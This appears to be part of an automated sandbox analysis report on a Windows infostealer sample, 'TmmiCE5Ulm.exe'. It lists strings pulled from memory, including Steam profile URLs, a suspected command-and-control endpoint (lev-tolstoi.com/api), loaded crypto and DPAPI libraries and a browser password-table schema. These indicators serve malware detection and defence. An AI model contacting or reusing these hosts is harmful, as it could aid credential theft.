                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2270145793.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2231698697.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/2
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2689933527.0000000005A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/=9
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001128000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334452536.000000000112B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204720643.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001149000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204795356.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204356484.0000000005B00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/b
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2334229101.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2228599565.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001113000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001161000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi:
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2252932999.00000000011AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/plF
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204525623.0000000001193000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2205019616.000000000118B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/tF
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2270285574.0000000001143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.000000000110D000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001184000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowere
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2155269616.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/

                System Summary

                Source: TmmiCE5Ulm.exe Static PE information: section name:
                Source: TmmiCE5Ulm.exe Static PE information: section name: .rsrc
                Source: TmmiCE5Ulm.exe Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A8788 0_3_011A8788
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112AB7E 0_3_0112AB7E
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5600 -s 1924
                Source: TmmiCE5Ulm.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: TmmiCE5Ulm.exe Static PE information: Section: ZLIB complexity 0.997431506849315
                Source: TmmiCE5Ulm.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@2/5@13/4
                Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5600
                Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\225c3a85-9a0a-401e-8fa4-34f6b7a66a76
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005A93000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157894493.0000000005A92000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2157090654.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2181566984.0000000005B25000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: TmmiCE5Ulm.exe ReversingLabs: Detection: 57%
                Source: TmmiCE5Ulm.exe Virustotal: Detection: 69%
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File read: C:\Users\user\Desktop\TmmiCE5Ulm.exe
                Source: unknown Process created: C:\Users\user\Desktop\TmmiCE5Ulm.exe "C:\Users\user\Desktop\TmmiCE5Ulm.exe"
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: userenv.dll
